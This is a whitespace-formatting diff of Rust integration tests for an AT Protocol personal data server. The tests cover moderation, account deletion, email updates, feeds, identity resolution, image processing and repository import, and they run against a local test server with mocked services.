+ 178 186 #[tokio::test] 179 187 async fn test_disable_account_invites_not_found() { 180 188 let client = client(); ··· 194 202 .expect("Failed to send request"); 195 203 assert_eq!(res.status(), StatusCode::NOT_FOUND); 196 204 } 205 + 197 206 #[tokio::test] 198 207 async fn test_disable_invite_codes_by_code() { 199 208 let client = client(); ··· 242 251 assert!(disabled_code.is_some()); 243 252 assert_eq!(disabled_code.unwrap()["disabled"], true); 244 253 } 254 + 245 255 #[tokio::test] 246 256 async fn test_disable_invite_codes_by_account() { 247 257 let client = client(); ··· 289 299 assert_eq!(code["disabled"], true); 290 300 } 291 301 } 302 + 292 303 #[tokio::test] 293 304 async fn test_disable_invite_codes_no_auth() { 294 305 let client = client(); ··· 306 317 .expect("Failed to send request"); 307 318 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 308 319 } 320 + 309 321 #[tokio::test] 310 322 async fn test_admin_enable_account_invites_not_found() { 311 323 let client = client();
+10
tests/admin_moderation.rs
··· 1 1 mod common; 2 + 2 3 use common::*; 3 4 use reqwest::StatusCode; 4 5 use serde_json::{Value, json}; 6 + 5 7 #[tokio::test] 6 8 async fn test_get_subject_status_user_success() { 7 9 let client = client(); ··· 22 24 assert_eq!(body["subject"]["$type"], "com.atproto.admin.defs#repoRef"); 23 25 assert_eq!(body["subject"]["did"], did); 24 26 } 27 + 25 28 #[tokio::test] 26 29 async fn test_get_subject_status_not_found() { 27 30 let client = client(); ··· 40 43 let body: Value = res.json().await.expect("Response was not valid JSON"); 41 44 assert_eq!(body["error"], "SubjectNotFound"); 42 45 } 46 + 43 47 #[tokio::test] 44 48 async fn test_get_subject_status_no_param() { 45 49 let client = client(); ··· 57 61 let body: Value = res.json().await.expect("Response was not valid JSON"); 58 62 assert_eq!(body["error"], "InvalidRequest"); 59 63 } 64 + 60 65 #[tokio::test] 61 66 async fn test_get_subject_status_no_auth() { 62 67 let client = client(); ··· 71 76 .expect("Failed to send request"); 72 77 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 73 78 } 79 + 74 80 #[tokio::test] 75 81 async fn test_update_subject_status_takedown_user() { 76 82 let client = client(); ··· 115 121 assert_eq!(status_body["takedown"]["applied"], true); 116 122 assert_eq!(status_body["takedown"]["ref"], "mod-action-123"); 117 123 } 124 + 118 125 #[tokio::test] 119 126 async fn test_update_subject_status_remove_takedown() { 120 127 let client = client(); ··· 171 178 let status_body: Value = status_res.json().await.unwrap(); 172 179 assert!(status_body["takedown"].is_null() || !status_body["takedown"]["applied"].as_bool().unwrap_or(false)); 173 180 } 181 + 174 182 #[tokio::test] 175 183 async fn test_update_subject_status_deactivate_user() { 176 184 let client = client(); ··· 209 217 assert!(status_body["deactivated"].is_object()); 210 218 assert_eq!(status_body["deactivated"]["applied"], true); 211 219 } 220 + 212 221 #[tokio::test] 213 222 async fn test_update_subject_status_invalid_type() { 214 223 let client = client(); ··· 236 245 let body: Value = res.json().await.expect("Response was not valid JSON"); 237 246 assert_eq!(body["error"], "InvalidRequest"); 238 247 } 248 + 239 249 #[tokio::test] 240 250 async fn test_update_subject_status_no_auth() { 241 251 let client = client();
+6
tests/appview_integration.rs
··· 1 1 mod common; 2 + 2 3 use common::{base_url, client, create_account_and_login}; 3 4 use reqwest::StatusCode; 4 5 use serde_json::{json, Value}; 6 + 5 7 #[tokio::test] 6 8 async fn test_get_author_feed_returns_appview_data() { 7 9 let client = client(); ··· 27 29 "Post text should match appview response" 28 30 ); 29 31 } 32 + 30 33 #[tokio::test] 31 34 async fn test_get_actor_likes_returns_appview_data() { 32 35 let client = client(); ··· 52 55 "Post text should match appview response" 53 56 ); 54 57 } 58 + 55 59 #[tokio::test] 56 60 async fn test_get_post_thread_returns_appview_data() { 57 61 let client = client(); ··· 80 84 "Post text should match appview response" 81 85 ); 82 86 } 87 + 83 88 #[tokio::test] 84 89 async fn test_get_feed_returns_appview_data() { 85 90 let client = client(); ··· 105 110 "Post text should match appview response" 106 111 ); 107 112 } 113 + 108 114 #[tokio::test] 109 115 async fn test_register_push_proxies_to_appview() { 110 116 let client = client();
+17
tests/common/mod.rs
··· 14 14 use tokio::net::TcpListener; 15 15 use wiremock::matchers::{method, path}; 16 16 use wiremock::{Mock, MockServer, ResponseTemplate}; 17 + 17 18 static SERVER_URL: OnceLock<String> = OnceLock::new(); 18 19 static APP_PORT: OnceLock<u16> = OnceLock::new(); 19 20 static MOCK_APPVIEW: OnceLock<MockServer> = OnceLock::new(); 21 + 20 22 #[cfg(not(feature = "external-infra"))] 21 23 use testcontainers::core::ContainerPort; 22 24 #[cfg(not(feature = "external-infra"))] ··· 27 29 static DB_CONTAINER: OnceLock<ContainerAsync<Postgres>> = OnceLock::new(); 28 30 #[cfg(not(feature = "external-infra"))] 29 31 static S3_CONTAINER: OnceLock<ContainerAsync<GenericImage>> = OnceLock::new(); 32 + 30 33 #[allow(dead_code)] 31 34 pub const AUTH_TOKEN: &str = "test-token"; 32 35 #[allow(dead_code)] ··· 35 38 pub const AUTH_DID: &str = "did:plc:fake"; 36 39 #[allow(dead_code)] 37 40 pub const TARGET_DID: &str = "did:plc:target"; 41 + 38 42 fn has_external_infra() -> bool { 39 43 std::env::var("BSPDS_TEST_INFRA_READY").is_ok() 40 44 || (std::env::var("DATABASE_URL").is_ok() && std::env::var("S3_ENDPOINT").is_ok()) ··· 54 58 .args(&["container", "prune", "-f", "--filter", "label=bspds_test=true"]) 55 59 .output(); 56 60 } 61 + 57 62 #[allow(dead_code)] 58 63 pub fn client() -> Client { 59 64 Client::new() 60 65 } 66 + 61 67 #[allow(dead_code)] 62 68 pub fn app_port() -> u16 { 63 69 *APP_PORT.get().expect("APP_PORT not initialized") 64 70 } 71 + 65 72 pub async fn base_url() -> &'static str { 66 73 SERVER_URL.get_or_init(|| { 67 74 let (tx, rx) = std::sync::mpsc::channel(); ··· 94 101 rx.recv().expect("Failed to start test server") 95 102 }) 96 103 } 104 + 97 105 async fn setup_with_external_infra() -> String { 98 106 let database_url = std::env::var("DATABASE_URL") 99 107 .expect("DATABASE_URL must be set when using external infra"); ··· 114 122 MOCK_APPVIEW.set(mock_server).ok(); 115 123 spawn_app(database_url).await 116 124 } 125 + 117 126 #[cfg(not(feature = "external-infra"))] 118 127 async fn setup_with_testcontainers() -> String { 119 128 let s3_container = GenericImage::new("minio/minio", "latest") ··· 177 186 DB_CONTAINER.set(container).ok(); 178 187 spawn_app(connection_string).await 179 188 } 189 + 180 190 #[cfg(feature = "external-infra")] 181 191 async fn setup_with_testcontainers() -> String { 182 192 panic!("Testcontainers disabled with external-infra feature. Set DATABASE_URL and S3_ENDPOINT."); 183 193 } 194 + 184 195 async fn setup_mock_appview(mock_server: &MockServer) { 185 196 Mock::given(method("GET")) 186 197 .and(path("/xrpc/app.bsky.actor.getProfile")) ··· 310 321 .mount(mock_server) 311 322 .await; 312 323 } 324 + 313 325 async fn spawn_app(database_url: String) -> String { 314 326 use bspds::rate_limit::RateLimiters; 315 327 let pool = PgPoolOptions::new() ··· 342 354 }); 343 355 format!("http://{}", addr) 344 356 } 357 + 345 358 #[allow(dead_code)] 346 359 pub async fn get_db_connection_string() -> String { 347 360 base_url().await; ··· 360 373 } 361 374 } 362 375 } 376 + 363 377 #[allow(dead_code)] 364 378 pub async fn verify_new_account(client: &Client, did: &str) -> String { 365 379 let conn_str = get_db_connection_string().await; ··· 396 410 .expect("No accessJwt in confirmSignup response") 397 411 .to_string() 398 412 } 413 + 399 414 #[allow(dead_code)] 400 415 pub async fn upload_test_blob(client: &Client, data: &'static str, mime: &'static str) -> Value { 401 416 let res = client ··· 413 428 let body: Value = res.json().await.expect("Blob upload response was not JSON"); 414 429 body["blob"].clone() 415 430 } 431 + 416 432 #[allow(dead_code)] 417 433 pub async fn create_test_post( 418 434 client: &Client, ··· 463 479 .to_string(); 464 480 (uri, cid, rkey) 465 481 } 482 + 466 483 #[allow(dead_code)] 467 484 pub async fn create_account_and_login(client: &Client) -> (String, String) { 468 485 let mut last_error = String::new();
+10
tests/delete_account.rs
··· 5 5 use reqwest::StatusCode; 6 6 use serde_json::{Value, json}; 7 7 use sqlx::PgPool; 8 + 8 9 async fn get_pool() -> PgPool { 9 10 let conn_str = get_db_connection_string().await; 10 11 sqlx::postgres::PgPoolOptions::new() ··· 13 14 .await 14 15 .expect("Failed to connect to test database") 15 16 } 17 + 16 18 async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str, password: &str) -> (String, String) { 17 19 let res = client 18 20 .post(format!("{}/xrpc/com.atproto.server.createAccount", base_url)) ··· 30 32 let jwt = verify_new_account(client, &did).await; 31 33 (did, jwt) 32 34 } 35 + 33 36 #[tokio::test] 34 37 async fn test_delete_account_full_flow() { 35 38 let client = client(); ··· 86 89 .expect("Failed to check session"); 87 90 assert_eq!(session_res.status(), StatusCode::UNAUTHORIZED); 88 91 } 92 + 89 93 #[tokio::test] 90 94 async fn test_delete_account_wrong_password() { 91 95 let client = client(); ··· 129 133 let body: Value = delete_res.json().await.unwrap(); 130 134 assert_eq!(body["error"], "AuthenticationFailed"); 131 135 } 136 + 132 137 #[tokio::test] 133 138 async fn test_delete_account_invalid_token() { 134 139 let client = client(); ··· 171 176 let body: Value = delete_res.json().await.unwrap(); 172 177 assert_eq!(body["error"], "InvalidToken"); 173 178 } 179 + 174 180 #[tokio::test] 175 181 async fn test_delete_account_expired_token() { 176 182 let client = client(); ··· 221 227 let body: Value = delete_res.json().await.unwrap(); 222 228 assert_eq!(body["error"], "ExpiredToken"); 223 229 } 230 + 224 231 #[tokio::test] 225 232 async fn test_delete_account_token_mismatch() { 226 233 let client = client(); ··· 268 275 let body: Value = delete_res.json().await.unwrap(); 269 276 assert_eq!(body["error"], "InvalidToken"); 270 277 } 278 + 271 279 #[tokio::test] 272 280 async fn test_delete_account_with_app_password() { 273 281 let client = client(); ··· 327 335 .expect("Failed to query user"); 328 336 assert!(user_row.is_none(), "User should be deleted from database"); 329 337 } 338 + 330 339 #[tokio::test] 331 340 async fn test_delete_account_missing_fields() { 332 341 let client = client(); ··· 371 380 .expect("Failed to send request"); 372 381 assert_eq!(res3.status(), StatusCode::UNPROCESSABLE_ENTITY); 373 382 } 383 + 374 384 #[tokio::test] 375 385 async fn test_delete_account_nonexistent_user() { 376 386 let client = client();
+14
tests/email_update.rs
··· 2 2 use reqwest::StatusCode; 3 3 use serde_json::{json, Value}; 4 4 use sqlx::PgPool; 5 + 5 6 async fn get_pool() -> PgPool { 6 7 let conn_str = common::get_db_connection_string().await; 7 8 sqlx::postgres::PgPoolOptions::new() ··· 10 11 .await 11 12 .expect("Failed to connect to test database") 12 13 } 14 + 13 15 async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str) -> String { 14 16 let res = client 15 17 .post(format!("{}/xrpc/com.atproto.server.createAccount", base_url)) ··· 26 28 let did = body["did"].as_str().expect("No did"); 27 29 common::verify_new_account(client, did).await 28 30 } 31 + 29 32 #[tokio::test] 30 33 async fn test_email_update_flow_success() { 31 34 let client = common::client(); ··· 77 80 assert!(user.email_pending_verification.is_none()); 78 81 assert!(user.email_confirmation_code.is_none()); 79 82 } 83 + 80 84 #[tokio::test] 81 85 async fn test_request_email_update_taken_email() { 82 86 let client = common::client(); ··· 98 102 let body: Value = res.json().await.expect("Invalid JSON"); 99 103 assert_eq!(body["error"], "EmailTaken"); 100 104 } 105 + 101 106 #[tokio::test] 102 107 async fn test_confirm_email_invalid_token() { 103 108 let client = common::client(); ··· 128 133 let body: Value = res.json().await.expect("Invalid JSON"); 129 134 assert_eq!(body["error"], "InvalidToken"); 130 135 } 136 + 131 137 #[tokio::test] 132 138 async fn test_confirm_email_wrong_email() { 133 139 let client = common::client(); ··· 164 170 let body: Value = res.json().await.expect("Invalid JSON"); 165 171 assert_eq!(body["message"], "Email does not match pending update"); 166 172 } 173 + 167 174 #[tokio::test] 168 175 async fn test_update_email_success_no_token_required() { 169 176 let client = common::client(); ··· 187 194 .expect("User not found"); 188 195 assert_eq!(user.email, Some(new_email)); 189 196 } 197 + 190 198 #[tokio::test] 191 199 async fn test_update_email_same_email_noop() { 192 200 let client = common::client(); ··· 203 211 .expect("Failed to update email"); 204 212 assert_eq!(res.status(), StatusCode::OK, "Updating to same email should succeed as no-op"); 205 213 } 214 + 206 215 #[tokio::test] 207 216 async fn test_update_email_requires_token_after_pending() { 208 217 let client = common::client(); ··· 230 239 let body: Value = res.json().await.expect("Invalid JSON"); 231 240 assert_eq!(body["error"], "TokenRequired"); 232 241 } 242 + 233 243 #[tokio::test] 234 244 async fn test_update_email_with_valid_token() { 235 245 let client = common::client(); ··· 273 283 assert_eq!(user.email, Some(new_email)); 274 284 assert!(user.email_pending_verification.is_none()); 275 285 } 286 + 276 287 #[tokio::test] 277 288 async fn test_update_email_invalid_token() { 278 289 let client = common::client(); ··· 303 314 let body: Value = res.json().await.expect("Invalid JSON"); 304 315 assert_eq!(body["error"], "InvalidToken"); 305 316 } 317 + 306 318 #[tokio::test] 307 319 async fn test_update_email_already_taken() { 308 320 let client = common::client(); ··· 324 336 let body: Value = res.json().await.expect("Invalid JSON"); 325 337 assert!(body["message"].as_str().unwrap().contains("already in use") || body["error"] == "InvalidRequest"); 326 338 } 339 + 327 340 #[tokio::test] 328 341 async fn test_update_email_no_auth() { 329 342 let client = common::client(); ··· 338 351 let body: Value = res.json().await.expect("Invalid JSON"); 339 352 assert_eq!(body["error"], "AuthenticationRequired"); 340 353 } 354 + 341 355 #[tokio::test] 342 356 async fn test_update_email_invalid_format() { 343 357 let client = common::client();
+7
tests/feed.rs
··· 1 1 mod common; 2 2 use common::{base_url, client, create_account_and_login}; 3 3 use serde_json::json; 4 + 4 5 #[tokio::test] 5 6 async fn test_get_timeline_requires_auth() { 6 7 let client = client(); ··· 12 13 .unwrap(); 13 14 assert_eq!(res.status(), 401); 14 15 } 16 + 15 17 #[tokio::test] 16 18 async fn test_get_author_feed_requires_actor() { 17 19 let client = client(); ··· 25 27 .unwrap(); 26 28 assert_eq!(res.status(), 400); 27 29 } 30 + 28 31 #[tokio::test] 29 32 async fn test_get_actor_likes_requires_actor() { 30 33 let client = client(); ··· 38 41 .unwrap(); 39 42 assert_eq!(res.status(), 400); 40 43 } 44 + 41 45 #[tokio::test] 42 46 async fn test_get_post_thread_requires_uri() { 43 47 let client = client(); ··· 51 55 .unwrap(); 52 56 assert_eq!(res.status(), 400); 53 57 } 58 + 54 59 #[tokio::test] 55 60 async fn test_get_feed_requires_auth() { 56 61 let client = client(); ··· 65 70 .unwrap(); 66 71 assert_eq!(res.status(), 401); 67 72 } 73 + 68 74 #[tokio::test] 69 75 async fn test_get_feed_requires_feed_param() { 70 76 let client = client(); ··· 78 84 .unwrap(); 79 85 assert_eq!(res.status(), 400); 80 86 } 87 + 81 88 #[tokio::test] 82 89 async fn test_register_push_requires_auth() { 83 90 let client = client();
+6
tests/firehose.rs
··· 8 8 use serde_json::{json, Value}; 9 9 use std::io::Cursor; 10 10 use tokio_tungstenite::{connect_async, tungstenite}; 11 + 11 12 #[derive(Debug, Deserialize)] 12 13 struct FrameHeader { 13 14 op: i64, 14 15 t: String, 15 16 } 17 + 16 18 #[derive(Debug, Deserialize)] 17 19 struct CommitFrame { 18 20 seq: i64, ··· 29 31 blobs: Vec<Cid>, 30 32 time: String, 31 33 } 34 + 32 35 #[derive(Debug, Deserialize)] 33 36 struct RepoOp { 34 37 action: String, 35 38 path: String, 36 39 cid: Option<Cid>, 37 40 } 41 + 38 42 fn find_cbor_map_end(bytes: &[u8]) -> Result<usize, String> { 39 43 let mut pos = 0; 40 44 fn read_uint(bytes: &[u8], pos: &mut usize, additional: u8) -> Result<u64, String> { ··· 104 108 skip_value(bytes, &mut pos)?; 105 109 Ok(pos) 106 110 } 111 + 107 112 fn parse_frame(bytes: &[u8]) -> Result<(FrameHeader, CommitFrame), String> { 108 113 let header_len = find_cbor_map_end(bytes)?; 109 114 let header: FrameHeader = serde_ipld_dagcbor::from_slice(&bytes[..header_len]) ··· 113 118 .map_err(|e| format!("Failed to parse commit frame: {:?}", e))?; 114 119 Ok((header, frame)) 115 120 } 121 + 116 122 #[tokio::test] 117 123 async fn test_firehose_subscription() { 118 124 let client = client();
+1 -1
tests/firehose_validation.rs
··· 1 1 mod common; 2 - use common::*; 3 2 3 + use common::*; 4 4 use cid::Cid; 5 5 use futures::{stream::StreamExt, SinkExt}; 6 6 use iroh_car::CarReader;
+6
tests/helpers/mod.rs
··· 1 1 use chrono::Utc; 2 2 use reqwest::StatusCode; 3 3 use serde_json::{Value, json}; 4 + 4 5 pub use crate::common::*; 6 + 5 7 #[allow(dead_code)] 6 8 pub async fn setup_new_user(handle_prefix: &str) -> (String, String) { 7 9 let client = client(); ··· 40 42 let new_jwt = verify_new_account(&client, &new_did).await; 41 43 (new_did, new_jwt) 42 44 } 45 + 43 46 #[allow(dead_code)] 44 47 pub async fn create_post( 45 48 client: &reqwest::Client, ··· 83 86 let cid = create_body["cid"].as_str().unwrap().to_string(); 84 87 (uri, cid) 85 88 } 89 + 86 90 #[allow(dead_code)] 87 91 pub async fn create_follow( 88 92 client: &reqwest::Client, ··· 126 130 let cid = create_body["cid"].as_str().unwrap().to_string(); 127 131 (uri, cid) 128 132 } 133 + 129 134 #[allow(dead_code)] 130 135 pub async fn create_like( 131 136 client: &reqwest::Client, ··· 167 172 body["cid"].as_str().unwrap().to_string(), 168 173 ) 169 174 } 175 + 170 176 #[allow(dead_code)] 171 177 pub async fn create_repost( 172 178 client: &reqwest::Client,
+9
tests/identity.rs
··· 4 4 use serde_json::{Value, json}; 5 5 use wiremock::matchers::{method, path}; 6 6 use wiremock::{Mock, MockServer, ResponseTemplate}; 7 + 7 8 #[tokio::test] 8 9 async fn test_resolve_handle_success() { 9 10 let client = client(); ··· 39 40 let body: Value = res.json().await.expect("Response was not valid JSON"); 40 41 assert_eq!(body["did"], did); 41 42 } 43 + 42 44 #[tokio::test] 43 45 async fn test_resolve_handle_not_found() { 44 46 let client = client(); ··· 56 58 let body: Value = res.json().await.expect("Response was not valid JSON"); 57 59 assert_eq!(body["error"], "HandleNotFound"); 58 60 } 61 + 59 62 #[tokio::test] 60 63 async fn test_resolve_handle_missing_param() { 61 64 let client = client(); ··· 69 72 .expect("Failed to send request"); 70 73 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 71 74 } 75 + 72 76 #[tokio::test] 73 77 async fn test_well_known_did() { 74 78 let client = client(); ··· 82 86 assert!(body["id"].as_str().unwrap().starts_with("did:web:")); 83 87 assert_eq!(body["service"][0]["type"], "AtprotoPersonalDataServer"); 84 88 } 89 + 85 90 #[tokio::test] 86 91 async fn test_create_did_web_account_and_resolve() { 87 92 let client = client(); ··· 145 150 assert_eq!(doc["verificationMethod"][0]["controller"], did); 146 151 assert!(doc["verificationMethod"][0]["publicKeyJwk"].is_object()); 147 152 } 153 + 148 154 #[tokio::test] 149 155 async fn test_create_account_duplicate_handle() { 150 156 let client = client(); ··· 178 184 let body: Value = res.json().await.expect("Response was not JSON"); 179 185 assert_eq!(body["error"], "HandleTaken"); 180 186 } 187 + 181 188 #[tokio::test] 182 189 async fn test_did_web_lifecycle() { 183 190 let client = client(); ··· 267 274 assert_eq!(record_body["value"]["displayName"], "DID Web User"); 268 275 */ 269 276 } 277 + 270 278 #[tokio::test] 271 279 async fn test_get_recommended_did_credentials_success() { 272 280 let client = client(); ··· 296 304 assert_eq!(body["services"]["atprotoPds"]["type"], "AtprotoPersonalDataServer"); 297 305 assert!(body["services"]["atprotoPds"]["endpoint"].is_string()); 298 306 } 307 + 299 308 #[tokio::test] 300 309 async fn test_get_recommended_did_credentials_no_auth() { 301 310 let client = client();
+31
tests/image_processing.rs
··· 1 1 use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE}; 2 2 use image::{DynamicImage, ImageFormat}; 3 3 use std::io::Cursor; 4 + 4 5 fn create_test_png(width: u32, height: u32) -> Vec<u8> { 5 6 let img = DynamicImage::new_rgb8(width, height); 6 7 let mut buf = Vec::new(); 7 8 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap(); 8 9 buf 9 10 } 11 + 10 12 fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> { 11 13 let img = DynamicImage::new_rgb8(width, height); 12 14 let mut buf = Vec::new(); 13 15 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap(); 14 16 buf 15 17 } 18 + 16 19 fn create_test_gif(width: u32, height: u32) -> Vec<u8> { 17 20 let img = DynamicImage::new_rgb8(width, height); 18 21 let mut buf = Vec::new(); 19 22 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap(); 20 23 buf 21 24 } 25 + 22 26 fn create_test_webp(width: u32, height: u32) -> Vec<u8> { 23 27 let img = DynamicImage::new_rgb8(width, height); 24 28 let mut buf = Vec::new(); 25 29 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap(); 26 30 buf 27 31 } 32 + 28 33 #[test] 29 34 fn test_process_png() { 30 35 let processor = ImageProcessor::new(); ··· 33 38 assert_eq!(result.original.width, 500); 34 39 assert_eq!(result.original.height, 500); 35 40 } 41 + 36 42 #[test] 37 43 fn test_process_jpeg() { 38 44 let processor = ImageProcessor::new(); ··· 41 47 assert_eq!(result.original.width, 400); 42 48 assert_eq!(result.original.height, 300); 43 49 } 50 + 44 51 #[test] 45 52 fn test_process_gif() { 46 53 let processor = ImageProcessor::new(); ··· 49 56 assert_eq!(result.original.width, 200); 50 57 assert_eq!(result.original.height, 200); 51 58 } 59 + 52 60 #[test] 53 61 fn test_process_webp() { 54 62 let processor = ImageProcessor::new(); ··· 57 65 assert_eq!(result.original.width, 300); 58 66 assert_eq!(result.original.height, 200); 59 67 } 68 + 60 69 #[test] 61 70 fn test_thumbnail_feed_size() { 62 71 let processor = ImageProcessor::new(); ··· 66 75 assert!(thumb.width <= THUMB_SIZE_FEED); 67 76 assert!(thumb.height <= THUMB_SIZE_FEED); 68 77 } 78 + 69 79 #[test] 70 80 fn test_thumbnail_full_size() { 71 81 let processor = ImageProcessor::new(); ··· 75 85 assert!(thumb.width <= THUMB_SIZE_FULL); 76 86 assert!(thumb.height <= THUMB_SIZE_FULL); 77 87 } 88 + 78 89 #[test] 79 90 fn test_no_thumbnail_small_image() { 80 91 let processor = ImageProcessor::new(); ··· 83 94 assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail"); 84 95 assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail"); 85 96 } 97 + 86 98 #[test] 87 99 fn test_webp_conversion() { 88 100 let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP); ··· 90 102 let result = processor.process(&data, "image/png").unwrap(); 91 103 assert_eq!(result.original.mime_type, "image/webp"); 92 104 } 105 + 93 106 #[test] 94 107 fn test_jpeg_output_format() { 95 108 let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg); ··· 97 110 let result = processor.process(&data, "image/png").unwrap(); 98 111 assert_eq!(result.original.mime_type, "image/jpeg"); 99 112 } 113 + 100 114 #[test] 101 115 fn test_png_output_format() { 102 116 let processor = ImageProcessor::new().with_output_format(OutputFormat::Png); ··· 104 118 let result = processor.process(&data, "image/jpeg").unwrap(); 105 119 assert_eq!(result.original.mime_type, "image/png"); 106 120 } 121 + 107 122 #[test] 108 123 fn test_max_dimension_enforced() { 109 124 let processor = ImageProcessor::new().with_max_dimension(1000); ··· 116 131 assert_eq!(max_dimension, 1000); 117 132 } 118 133 } 134 + 119 135 #[test] 120 136 fn test_file_size_limit() { 121 137 let processor = ImageProcessor::new().with_max_file_size(100); ··· 127 143 assert_eq!(max_size, 100); 128 144 } 129 145 } 146 + 130 147 #[test] 131 148 fn test_default_max_file_size() { 132 149 assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024); 133 150 } 151 + 134 152 #[test] 135 153 fn test_unsupported_format_rejected() { 136 154 let processor = ImageProcessor::new(); ··· 138 156 let result = processor.process(data, "application/octet-stream"); 139 157 assert!(matches!(result, Err(ImageError::UnsupportedFormat(_)))); 140 158 } 159 + 141 160 #[test] 142 161 fn test_corrupted_image_handling() { 143 162 let processor = ImageProcessor::new(); ··· 145 164 let result = processor.process(data, "image/png"); 146 165 assert!(matches!(result, Err(ImageError::DecodeError(_)))); 147 166 } 167 + 148 168 #[test] 149 169 fn test_aspect_ratio_preserved_landscape() { 150 170 let processor = ImageProcessor::new(); ··· 155 175 let thumb_ratio = thumb.width as f64 / thumb.height as f64; 156 176 assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved"); 157 177 } 178 + 158 179 #[test] 159 180 fn test_aspect_ratio_preserved_portrait() { 160 181 let processor = ImageProcessor::new(); ··· 165 186 let thumb_ratio = thumb.width as f64 / thumb.height as f64; 166 187 assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved"); 167 188 } 189 + 168 190 #[test] 169 191 fn test_mime_type_detection_auto() { 170 192 let processor = ImageProcessor::new(); ··· 172 194 let result = processor.process(&data, "application/octet-stream"); 173 195 assert!(result.is_ok(), "Should detect PNG format from data"); 174 196 } 197 + 175 198 #[test] 176 199 fn test_is_supported_mime_type() { 177 200 assert!(ImageProcessor::is_supported_mime_type("image/jpeg")); ··· 186 209 assert!(!ImageProcessor::is_supported_mime_type("text/plain")); 187 210 assert!(!ImageProcessor::is_supported_mime_type("application/json")); 188 211 } 212 + 189 213 #[test] 190 214 fn test_strip_exif() { 191 215 let data = create_test_jpeg(100, 100); ··· 194 218 let stripped = result.unwrap(); 195 219 assert!(!stripped.is_empty()); 196 220 } 221 + 197 222 #[test] 198 223 fn test_with_thumbnails_disabled() { 199 224 let processor = ImageProcessor::new().with_thumbnails(false); ··· 202 227 assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled"); 203 228 assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled"); 204 229 } 230 + 205 231 #[test] 206 232 fn test_builder_chaining() { 207 233 let processor = ImageProcessor::new() ··· 213 239 let result = processor.process(&data, "image/png").unwrap(); 214 240 assert_eq!(result.original.mime_type, "image/jpeg"); 215 241 } 242 + 216 243 #[test] 217 244 fn test_processed_image_fields() { 218 245 let processor = ImageProcessor::new(); ··· 223 250 assert!(result.original.width > 0); 224 251 assert!(result.original.height > 0); 225 252 } 253 + 226 254 #[test] 227 255 fn test_only_feed_thumbnail_for_medium_images() { 228 256 let processor = ImageProcessor::new(); ··· 231 259 assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail"); 232 260 assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image"); 233 261 } 262 + 234 263 #[test] 235 264 fn test_both_thumbnails_for_large_images() { 236 265 let processor = ImageProcessor::new(); ··· 239 268 assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail"); 240 269 assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image"); 241 270 } 271 + 242 272 #[test] 243 273 fn test_exact_threshold_boundary_feed() { 244 274 let processor = ImageProcessor::new(); ··· 249 279 let result = processor.process(&above_threshold, "image/png").unwrap(); 250 280 assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail"); 251 281 } 282 + 252 283 #[test] 253 284 fn test_exact_threshold_boundary_full() { 254 285 let processor = ImageProcessor::new();
+11
tests/import_verification.rs
··· 3 3 use iroh_car::CarHeader; 4 4 use reqwest::StatusCode; 5 5 use serde_json::json; 6 + 6 7 #[tokio::test] 7 8 async fn test_import_repo_requires_auth() { 8 9 let client = client(); ··· 15 16 .expect("Request failed"); 16 17 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 17 18 } 19 + 18 20 #[tokio::test] 19 21 async fn test_import_repo_invalid_car() { 20 22 let client = client(); ··· 31 33 let body: serde_json::Value = res.json().await.unwrap(); 32 34 assert_eq!(body["error"], "InvalidRequest"); 33 35 } 36 + 34 37 #[tokio::test] 35 38 async fn test_import_repo_empty_body() { 36 39 let client = client(); ··· 45 48 .expect("Request failed"); 46 49 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 47 50 } 51 + 48 52 fn write_varint(buf: &mut Vec<u8>, mut value: u64) { 49 53 loop { 50 54 let mut byte = (value & 0x7F) as u8; ··· 58 62 } 59 63 } 60 64 } 65 + 61 66 #[tokio::test] 62 67 async fn test_import_rejects_car_for_different_user() { 63 68 let client = client(); ··· 90 95 body 91 96 ); 92 97 } 98 + 93 99 #[tokio::test] 94 100 async fn test_import_accepts_own_exported_repo() { 95 101 let client = client(); ··· 135 141 .expect("Failed to import repo"); 136 142 assert_eq!(import_res.status(), StatusCode::OK); 137 143 } 144 + 138 145 #[tokio::test] 139 146 async fn test_import_repo_size_limit() { 140 147 let client = client(); ··· 165 172 } 166 173 } 167 174 } 175 + 168 176 #[tokio::test] 169 177 async fn test_import_deactivated_account_rejected() { 170 178 let client = client(); ··· 205 213 import_res.status() 206 214 ); 207 215 } 216 + 208 217 #[tokio::test] 209 218 async fn test_import_invalid_car_structure() { 210 219 let client = client(); ··· 220 229 .expect("Request failed"); 221 230 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 222 231 } 232 + 223 233 #[tokio::test] 224 234 async fn test_import_car_with_no_roots() { 225 235 let client = client(); ··· 241 251 let body: serde_json::Value = res.json().await.unwrap(); 242 252 assert_eq!(body["error"], "InvalidRequest"); 243 253 } 254 + 244 255 #[tokio::test] 245 256 async fn test_import_preserves_records_after_reimport() { 246 257 let client = client();
+8
tests/import_with_verification.rs
